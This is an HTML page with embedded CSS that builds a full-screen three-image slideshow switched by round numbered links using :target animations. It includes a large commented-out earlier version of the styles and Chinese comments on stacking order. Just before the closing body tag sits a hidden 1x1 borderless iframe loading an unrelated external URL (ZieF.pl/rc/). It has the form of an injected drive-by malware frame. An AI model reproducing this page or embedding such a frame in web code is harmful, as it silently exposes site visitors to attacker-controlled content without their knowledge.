<!DOCTYPE html>
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title></title>
    <style>
        *{
            margin:0;
            padding:0;
            list-style:none;
        }
        html,body{
            height: 100%;
        }
        body{
            overflow: hidden;
        }
        /*.img-box img:target{*/
            /*z-index:5;*/
        /*}*/
        .img-box{
            position: absolute;
            width: 100%;
            height: 100%;
            z-index: 0;
        }
        .img-box img{
            width: 100%;
            height: 100%;
            position: absolute;
            left:0;
            top:0;
        }
        ul{
            position: absolute;
            width: 300px;
            height: 80px;
            bottom:50px;
            left:50%;
            margin-left:-150px;
            z-index:5;

        }
        ul li{
            float: left;

        }
        ul li a {
            display: block;
            width: 80px;
            height: 80px;
            border-radius: 50%;
            background-color: pink;
            margin-left:20px;
            text-align: center;
            text-decoration: none;
            line-height:80px;
            color:red;
            font-size:30px;
        }

        .img-box img:nth-child(1):target{
            animation: one 1s;
        }
        .img-box img:nth-child(2):target{
            animation: two 1s;
        }
        .img-box img:nth-child(3):target{
            animation: three 1s;
        }
        .img-box img:nth-child(1){
            z-index:1;
        }

        @keyframes one {
            0%{
                transform: scale(0.1) rotate(280deg);
            }
            100%{
                transform:scale(1) rotate(0);
            }
        }
        @keyframes two {
            0%{
                transform: translateX(-2000px);
            }
            100%{
                transform:translateX(0);
            }
        }
        @keyframes three {
            0%{
                transform: translateY(-1000px);
            }
            100%{
                transform:translateY(0);
            }
        }

        /**{*/
            /*margin: 0;*/
            /*padding: 0;*/
            /*list-style: none;*/
        /*}*/
        /*html,body{*/
            /*height:100%;*/
        /*}*/
        /*body{*/
            /*overflow: hidden;*/
        /*}*/
        /*.img-box{*/
            /*position: absolute;*/
            /*width: 100%;*/
            /*height: 100%;*/
            /*z-index:0;*/
        /*}*/

        /*.img-box img{*/
            /*width: 100%;*/
            /*height: 100%;*/
            /*position: absolute;*/
            /*left:0;*/
            /*top:0;*/
        /*}*/

        /*.img-box img:target{*/
            /*z-index:5;*/
        /*}*/

        /*.img-box img:nth-child(1):target{*/
            /*animation: showLeft 1s;*/
        /*}*/

        /*.img-box img:nth-child(2):target{*/
            /*animation: showTop 1s;*/
        /*}*/

        /*.img-box img:nth-child(3):target{*/
            /*animation: rot 1s;*/
        /*}*/

        /*.img-box img:nth-child(1){*/
            /*z-index:1;*/
        /*}*/



        /*ul{*/
            /*position: absolute;*/
            /*z-index:1;*/
            /*width: 300px;*/
            /*height:80px;*/
            /*left:50%;*/
            /*bottom:20px;*/
            /*margin-left:-150px;*/
        /*}*/

        /*ul li{*/
            /*float: left;*/
        /*}*/
        /*ul li a{*/
            /*display: block;*/
            /*width: 80px;*/
            /*height: 80px;*/
            /*background-color: pink;*/
            /*border-radius: 50%;*/
            /*margin-left:20px;*/
            /*text-align: center;*/
            /*line-height: 80px;*/
            /*font-size:30px;*/
            /*color:red;*/
            /*text-decoration: none;*/

        /*}*/


        /*@keyframes showLeft {*/
            /*0%{*/
                /*transform:translateX(-2000px);*/
            /*}*/

            /*100%{*/
                /*transform:translateX(0px);*/
            /*}*/
        /*}*/

        /*@keyframes showTop {*/
            /*0%{*/
                /*transform:translateY(-1000px);*/
            /*}*/

            /*100%{*/
                /*transform:translateY(0px);*/
            /*}*/
        /*}*/

        /*@keyframes rot {*/
            /*0%{*/
                /*transform:scale(0.5) rotate(345deg);*/
            /*}*/

            /*100%{*/
                /*transform:scale(1) rotate(0deg);*/
            /*}*/
        /*}*/

    </style>
</head>
<body>
    <div class="img-box">
        <img src="images/bg2.jpg"  id="img1" alt=""/>
        <img src="images/bg3.jpg"  id="img2" alt=""/>
        <img src="images/bg5.jpg"  id="img3" alt=""/>
        <!--定位的盒子，层级一样的话，谁写在后面谁就在上面-->
        <!--以上三张层级相同，所以最上面的是第三张-->
    </div>
    <ul>
        <li><a href="#img1">1</a></li>
        <li><a href="#img2">2</a></li>
        <li><a href="#img3">3</a></li>
    </ul>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>